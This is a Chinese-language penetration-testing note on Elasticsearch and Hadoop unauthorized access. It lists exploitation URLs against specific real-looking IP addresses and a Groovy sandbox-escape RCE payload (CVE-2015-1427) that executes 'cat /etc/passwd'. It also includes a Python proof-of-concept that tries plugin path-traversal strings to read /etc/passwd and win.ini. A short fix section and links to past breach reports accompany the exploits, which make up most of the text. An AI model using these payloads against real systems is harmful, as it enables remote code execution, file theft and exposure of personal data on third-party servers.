基本說明
VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html
延伸閱讀
https://www.ichunqiu.com/course/1413
Redis未授權訪問
其他 NoSQL未授權訪問
MongoDB、Redis、ES、Memcached、Hadoop
漏洞描述
ElasticSearch 是一款Java編寫的企業級搜索服務,啓動此服務默認會開放9200端口,可被非法操作數據。
漏洞檢測
默認端口 9200 HTTP協議
返回內容中包含”You Know, for Search”
(另外,AWVS也可發現)
一般來說,出現這種問題的多數是默認配置的ElasticSearch
(粗檢只考慮9200,如果是作爲甲方那還是要所有端口過一遍)
所以只要檢測9200就好了,如果端口不在9200,通常說明運維、開發者可能已經在考慮一些安全性問題,也就沒必要深究了。
一些利用的URL
節點URL
|
1 2 3 4 5 6 7 8
|
http://101.198.161.130:9200/_cat/indices/ http://101.198.161.130:9200/_plugin/head/ http://101.198.161.130:9200/_nodes http://101.198.161.130:9200/_nodes?prettify http://101.198.161.130:9200/_status http://101.198.161.130:9200/_search?pretty http://10.203.9.131:9200/zjftu/ http://10.203.9.131:9200/zjftu/_search?pretty
|
Hadoop未授權訪問
|
1 2
|
http://103.15.200.81:50070/dfshealth.jsp http://103.15.200.81:50070/logs/
|
漏洞危害
可被非法操作數據,對網站數據造成影響。
修復方案
1.關閉9200端口
2.防火牆上設置禁止外網訪問此端口。
歷史事件漏洞
安全脈搏搜索
烏雲鏡像搜索
CNVD搜索
1 360手機一處Elasticsearch未授權訪問 (2016-04-19)
https://www.secpulse.com/archives/46394.html
2 暴風某站Elasticsearch未授權訪問&Hadoop未授權訪問(2016-04-27)
https://www.secpulse.com/archives/49115.html
3 新華網某頻道服務器一處Elasticsearch配置不當/可任意操作/涉及被採訪人員信息(2016-03-19)
https://www.secpulse.com/archives/46976.html
(ElasticSearch RCE)
4 神器而已證券系列之九州證券某站Elasticsearch遠程代碼執行漏洞(2015-09-11 18:30)
(內含少量內網套路)
https://www.secpulse.com/archives/39822.html
5 風行某站Elasticsearch配置不當(任意文件讀取)
https://www.secpulse.com/archives/41126.html
6 上海某服務器一處Elasticsearch配置不當/可任意操作/涉及大量敏感信息(790多W用戶姓名\身份證號\民族\開房時間\退房時間\房間號等)(2016-03-16)
https://www.secpulse.com/archives/46801.html
7 廣西移動一處Elasticsearch配置不當/可任意操作/涉及大量敏感信息(用戶手機號碼/IMEI/IMSI/上網時間/地點等)
https://www.secpulse.com/archives/46798.html
ElasticSearch Groovy RCE (CVE-2015-1427)
影響範圍
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
對一下鏈接進行一個POST
http://127.0.0.1:9200/_search?pretty
POST的data域如下
|
1
|
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
|
幾個其他Exp
https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761
es_poc_1.py
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
|
#!/usr/bin/env python #-*- coding:utf-8 -*- import requests host= "10.203.9.131" port = 9200 def elastic_directoryTraversal(host,port): pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] pList = ['/../../../../../../../../../../../../../../etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'] for p in pluginList: for path in pList: urlA = "http://%s:%d/_plugin/%s%s" % (host,port,p,path) try: content = requests.get(urlA,timeout=5,allow_redirects=True,verify=False).content print content print "\n-------------------------------------------------------------\n" if "/root:/" in content: print 'Elasticsearch 任意文件讀取漏洞(CVE-2015-3337) Found!' except Exception,e: print e elastic_directoryTraversal(host,port)
|